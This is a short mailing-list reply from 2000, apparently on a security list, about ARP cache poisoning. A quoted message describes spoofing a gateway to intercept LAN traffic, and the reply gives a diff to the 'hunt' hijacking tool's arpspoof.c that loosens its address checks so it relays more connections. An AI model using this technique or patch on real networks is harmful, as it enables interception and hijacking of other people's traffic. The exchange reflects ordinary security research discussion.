Re: More on ARP cache poisoning

[lamont () ICOPYRIGHT COM (Granquist, Lamont)]

On Wed, 2 Feb 2000, Sebastian wrote:
> Yea, this has been in use for like 3 years now, just grab hunt and ARP relay
> external connections by ARP spoofing the gateway. There is no problem with
> redirecting/relaying/denying any TCP connection within a switched/non-switched
> LAN when there are no static ARP entries. Just ARP spoof the gateway address
> into the victims cache and have ip forwarding enabled.

You also need the following patch for hunt 1.3:

--- arpspoof.c~ Sun Oct  3 10:16:35 1999
+++ arpspoof.c  Sun Oct  3 10:16:58 1999
@@ -432,8 +432,8 @@
         list_lock(&l_arp_spoof);
         list_iter_set(&li, &l_arp_spoof);
         while ((asi = list_iter_get(&li))) {
-               if (p->p_iph->saddr == asi->dst_addr &&
-                   p->p_iph->daddr == asi->src_addr &&
+               if (/* p->p_iph->saddr == asi->dst_addr &&
+                   p->p_iph->daddr == asi->src_addr && */
                     memcmp(p->p_ethh->h_source, asi->dst_mac, ETH_ALEN) == 0 &&
                     memcmp(p->p_ethh->h_dest, asi->src_fake_mac, ETH_ALEN) == 0) {
                         packet_want(p);

(if that doesn't apply you probably lost the tabs)

I've also found that Cisco 2621s don't seem to accept the gratuitous ARPs
that hunt sends out.